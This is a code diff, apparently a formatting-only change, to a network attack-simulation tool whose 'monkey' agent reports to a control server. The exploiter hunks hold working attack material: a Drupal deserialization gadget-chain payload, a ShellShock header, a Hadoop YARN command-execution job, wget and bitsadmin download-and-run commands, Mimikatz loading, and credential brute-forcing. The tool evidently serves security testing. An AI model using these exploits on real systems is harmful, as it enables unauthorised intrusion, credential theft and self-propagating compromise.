POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{ TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not " TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not "
"protected against data loss.", "protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.", STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.", STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
}, },
PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY, PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY:[DATA], PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{ TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.", TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.", STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.", STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
}, },
PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION, PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY:[PEOPLE, WORKLOADS], PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{ TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.", TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found permissive user access policies.", STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.", STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
}, },
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, WORKLOADS], PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_LOGGING:{ TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.", TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found logging issues.", STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED:"ScoutSuite found no logging issues.", STATUS_PASSED: "ScoutSuite found no logging issues.",
}, },
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS], PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
TEST_SCOUTSUITE_SERVICE_SECURITY:{ TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.", TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY:{ FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED:"ScoutSuite found service security issues.", STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED:"ScoutSuite found no service security issues.", STATUS_PASSED: "ScoutSuite found no service security issues.",
}, },
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[DEVICES, NETWORKS], PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
}, },
} }
@ -315,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK) EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = { PILLARS_TO_TESTS = {
DATA:[], DATA: [],
PEOPLE:[], PEOPLE: [],
NETWORKS:[], NETWORKS: [],
DEVICES:[], DEVICES: [],
WORKLOADS:[], WORKLOADS: [],
VISIBILITY_ANALYTICS:[], VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION:[], AUTOMATION_ORCHESTRATION: [],
} }
PRINCIPLES_TO_TESTS = {} PRINCIPLES_TO_TESTS = {}

View File

@ -14,29 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum): class UsageEnum(Enum):
SMB = { SMB = {
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.", ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service " ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.", "via MS-SCMR.",
} }
MIMIKATZ = { MIMIKATZ = {
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.", ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.", ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
} }
MIMIKATZ_WINAPI = { MIMIKATZ_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to load mimikatz.", ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.", ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
} }
DROPPER = { DROPPER = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot." ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
} }
SINGLETON_WINAPI = { SINGLETON_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's " ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's "
"process.", "process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton" ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful.", " for monkey process wasn't successful.",
} }
DROPPER_WINAPI = { DROPPER_WINAPI = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot." ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
} }

View File

@ -18,8 +18,7 @@ def get_version(build=BUILD):
def print_version(): def print_version():
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument( parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
type=str
) )
args = parser.parse_args() args = parser.parse_args()
print(get_version(args.build)) print(get_version(args.build))

View File

@ -52,13 +52,13 @@ class ControlClient(object):
has_internet_access = check_internet_access(WormConfiguration.internet_services) has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = { monkey = {
"guid":GUID, "guid": GUID,
"hostname":hostname, "hostname": hostname,
"ip_addresses":local_ips(), "ip_addresses": local_ips(),
"description":" ".join(platform.uname()), "description": " ".join(platform.uname()),
"internet_access":has_internet_access, "internet_access": has_internet_access,
"config":WormConfiguration.as_dict(), "config": WormConfiguration.as_dict(),
"parent":parent, "parent": parent,
} }
if ControlClient.proxies: if ControlClient.proxies:
@ -67,7 +67,7 @@ class ControlClient(object):
requests.post( requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123 "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=20, timeout=20,
@ -134,15 +134,14 @@ class ControlClient(object):
"https://%s/api/monkey/%s" "https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123 % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
return {} return {}
@ -155,20 +154,19 @@ class ControlClient(object):
) )
return return
try: try:
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data} telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
requests.post( requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), "https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123 # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
@staticmethod @staticmethod
@ -176,19 +174,18 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
telemetry = {"monkey_guid":GUID, "log":json.dumps(log)} telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
requests.post( requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123 "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
@staticmethod @staticmethod
@ -206,8 +203,7 @@ class ControlClient(object):
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
return return
@ -238,16 +234,15 @@ class ControlClient(object):
requests.patch( requests.patch(
"https://%s/api/monkey/%s" "https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123 % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error":True}), data=json.dumps({"config_error": True}),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
return {} return {}
@ -287,7 +282,7 @@ class ControlClient(object):
else: else:
arch = "x86_64" arch = "x86_64"
return {"os":{"type":os, "machine":arch}} return {"os": {"type": os, "machine": arch}}
@staticmethod @staticmethod
def download_monkey_exe_by_filename(filename, size): def download_monkey_exe_by_filename(filename, size):
@ -316,8 +311,7 @@ class ControlClient(object):
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
@staticmethod @staticmethod
@ -333,7 +327,7 @@ class ControlClient(object):
"https://%s/api/monkey/download" "https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123 % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict), data=json.dumps(host_dict),
headers={"content-type":"application/json"}, headers={"content-type": "application/json"},
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT, timeout=LONG_REQUEST_TIMEOUT,
@ -350,8 +344,7 @@ class ControlClient(object):
except Exception as exc: except Exception as exc:
LOG.warning( LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
exc
) )
return None, None return None, None
@ -435,7 +428,7 @@ class ControlClient(object):
def report_start_on_island(): def report_start_on_island():
requests.post( requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island", f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island":True}), data=json.dumps({"started_on_island": True}),
verify=False, verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )

View File

@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args) self.opts, _ = arg_parser.parse_known_args(args)
self._config = { self._config = {
"source_path":os.path.abspath(sys.argv[0]), "source_path": os.path.abspath(sys.argv[0]),
"destination_path":self.opts.location, "destination_path": self.opts.location,
} }
def initialize(self): def initialize(self):
@ -147,7 +147,7 @@ class MonkeyDrops(object):
if OperatingSystem.Windows == SystemInfoCollector.get_os(): if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = ( monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]} MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
+ monkey_options + monkey_options
) )
else: else:
@ -156,12 +156,12 @@ class MonkeyDrops(object):
# and the inner one which actually # and the inner one which actually
# runs the monkey # runs the monkey
inner_monkey_cmdline = ( inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]} MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
+ monkey_options + monkey_options
) )
monkey_cmdline = GENERAL_CMDLINE_LINUX % { monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory":dest_path[0: dest_path.rfind("/")], "monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline":inner_monkey_cmdline, "monkey_commandline": inner_monkey_cmdline,
} }
monkey_process = subprocess.Popen( monkey_process = subprocess.Popen(
@ -189,8 +189,7 @@ class MonkeyDrops(object):
try: try:
if ( if (
(self._config["source_path"].lower() != self._config[ (self._config["source_path"].lower() != self._config["destination_path"].lower())
"destination_path"].lower())
and os.path.exists(self._config["source_path"]) and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first and WormConfiguration.dropper_try_move_first
): ):

View File

@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host): def __init__(self, host):
self._config = WormConfiguration self._config = WormConfiguration
self.exploit_info = { self.exploit_info = {
"display_name":self._EXPLOITED_SERVICE, "display_name": self._EXPLOITED_SERVICE,
"started":"", "started": "",
"finished":"", "finished": "",
"vulnerable_urls":[], "vulnerable_urls": [],
"vulnerable_ports":[], "vulnerable_ports": [],
"executed_cmds":[], "executed_cmds": [],
} }
self.exploit_attempts = [] self.exploit_attempts = []
self.host = host self.host = host
@ -76,12 +76,12 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""): def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append( self.exploit_attempts.append(
{ {
"result":result, "result": result,
"user":user, "user": user,
"password":password, "password": password,
"lm_hash":lm_hash, "lm_hash": lm_hash,
"ntlm_hash":ntlm_hash, "ntlm_hash": ntlm_hash,
"ssh_key":ssh_key, "ssh_key": ssh_key,
} }
) )
@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example' :param cmd: String of executed command. e.g. 'echo Example'
""" """
powershell = True if "powershell" in cmd.lower() else False powershell = True if "powershell" in cmd.lower() else False
self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell}) self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})

View File

@ -85,7 +85,7 @@ class DrupalExploiter(WebRCE):
response = requests.get( response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123 f"{url}?_format=hal_json", # noqa: DUO123
json=payload, json=payload,
headers={"Content-Type":"application/hal+json"}, headers={"Content-Type": "application/hal+json"},
verify=False, verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT, timeout=MEDIUM_REQUEST_TIMEOUT,
) )
@ -105,7 +105,7 @@ class DrupalExploiter(WebRCE):
r = requests.get( r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123 f"{url}?_format=hal_json", # noqa: DUO123
json=payload, json=payload,
headers={"Content-Type":"application/hal+json"}, headers={"Content-Type": "application/hal+json"},
verify=False, verify=False,
timeout=LONG_REQUEST_TIMEOUT, timeout=LONG_REQUEST_TIMEOUT,
) )
@ -171,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url): def build_exploitability_check_payload(url):
payload = { payload = {
"_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}}, "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type":{"target_id":"article"}, "type": {"target_id": "article"},
"title":{"value":"My Article"}, "title": {"value": "My Article"},
"body":{"value":""}, "body": {"value": ""},
} }
return payload return payload
def build_cmd_execution_payload(base, cmd): def build_cmd_execution_payload(base, cmd):
payload = { payload = {
"link":[ "link": [
{ {
"value":"link", "value": "link",
"options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000' "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"' 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:' 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";' '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@ -195,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
"".replace("|size|", str(len(cmd))).replace("|command|", cmd), "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
} }
], ],
"_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}}, "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
} }
return payload return payload

View File

@ -53,8 +53,8 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"] exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = { exploit_config["upload_commands"] = {
"linux":WGET_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD,
"windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP, "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
} }
return exploit_config return exploit_config

View File

@ -64,8 +64,7 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command): def exploit(self, url, command):
# Get the newly created application id # Get the newly created application id
resp = requests.post( resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
timeout=LONG_REQUEST_TIMEOUT
) )
resp = json.loads(resp.content) resp = json.loads(resp.content)
app_id = resp["application-id"] app_id = resp["application-id"]
@ -75,8 +74,7 @@ class HadoopExploiter(WebRCE):
) )
payload = self.build_payload(app_id, rand_name, command) payload = self.build_payload(app_id, rand_name, command)
resp = requests.post( resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
timeout=LONG_REQUEST_TIMEOUT
) )
return resp.status_code == 202 return resp.status_code == 202
@ -93,8 +91,7 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path): def build_command(self, path, http_path):
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
) )
if "linux" in self.host.os["type"]: if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND base_command = HADOOP_LINUX_COMMAND
@ -102,22 +99,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND base_command = HADOOP_WINDOWS_COMMAND
return base_command % { return base_command % {
"monkey_path":path, "monkey_path": path,
"http_path":http_path, "http_path": http_path,
"monkey_type":MONKEY_ARG, "monkey_type": MONKEY_ARG,
"parameters":monkey_cmd, "parameters": monkey_cmd,
} }
@staticmethod @staticmethod
def build_payload(app_id, name, command): def build_payload(app_id, name, command):
payload = { payload = {
"application-id":app_id, "application-id": app_id,
"application-name":name, "application-name": name,
"am-container-spec":{ "am-container-spec": {
"commands":{ "commands": {
"command":command, "command": command,
} }
}, },
"application-type":"YARN", "application-type": "YARN",
} }
return payload return payload

View File

@ -200,8 +200,7 @@ class MSSQLExploiter(HostExploiter):
) )
LOG.info( LOG.info(
"Successfully connected to host: {0}, using user: {1}, password (" "Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user, "SHA-512): {2}".format(host, user, self._config.hash_sensitive_data(password))
self._config.hash_sensitive_data(password))
) )
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password) self.report_login_attempt(True, user, password)

View File

@ -95,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
self.exploit_info["shares"] = {} self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict: for share in writable_shares_creds_dict:
self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]} self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share]) self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file. # Wait for samba server to load .so, execute code and create result file.
@ -118,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
if trigger_result is not None: if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result)) successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % { url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username":creds["username"], "username": creds["username"],
"host":self.host.ip_addr, "host": self.host.ip_addr,
"port":self.SAMBA_PORT, "port": self.SAMBA_PORT,
"share_name":share, "share_name": share,
} }
self.add_vuln_url(url) self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share]) self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -195,8 +195,7 @@ class SambaCryExploiter(HostExploiter):
file_content = None file_content = None
try: try:
file_id = smb_client.openFile( file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
desiredAccess=FILE_READ_DATA
) )
file_content = smb_client.readFile(tree_id, file_id) file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id) smb_client.closeFile(tree_id, file_id)
@ -237,12 +236,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product() creds = self._config.get_exploit_user_password_or_hash_product()
creds = [ creds = [
{"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash} {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds for user, password, lm_hash, ntlm_hash in creds
] ]
# Add empty credentials for anonymous shares. # Add empty credentials for anonymous shares.
creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""}) creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
return creds return creds
@ -268,7 +267,7 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name) pattern_result = pattern.search(smb_server_name)
is_vulnerable = False is_vulnerable = False
if pattern_result is not None: if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start(): pattern_result.end()] samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version_parts = samba_version.split(".") samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"): if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True is_vulnerable = True
@ -406,8 +405,7 @@ class SambaCryExploiter(HostExploiter):
return BytesIO( return BytesIO(
DROPPER_ARG DROPPER_ARG
+ build_monkey_commandline( + build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
str(location)
) )
) )

View File

@ -29,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter): class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type":"() { :;}; echo; "} _attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"] _TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash" _EXPLOITED_SERVICE = "Bash"
@ -45,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
def _exploit_host(self): def _exploit_host(self):
# start by picking ports # start by picking ports
candidate_services = { candidate_services = {
service:self.host.services[service] service: self.host.services[service]
for service in self.host.services for service in self.host.services
if ("name" in self.host.services[service]) if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http") and (self.host.services[service]["name"] == "http")
@ -243,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header) LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack) LOG.debug("Attack is: %s" % attack)
r = requests.get( r = requests.get(
url, headers={header:attack}, verify=False, timeout=TIMEOUT url, headers={header: attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123 ) # noqa: DUO123
result = r.content.decode() result = r.content.decode()
return result return result

View File

@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB" _EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = { KNOWN_PROTOCOLS = {
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139), "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445), "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
} }
USE_KERBEROS = False USE_KERBEROS = False
@ -119,7 +119,7 @@ class SmbExploiter(HostExploiter):
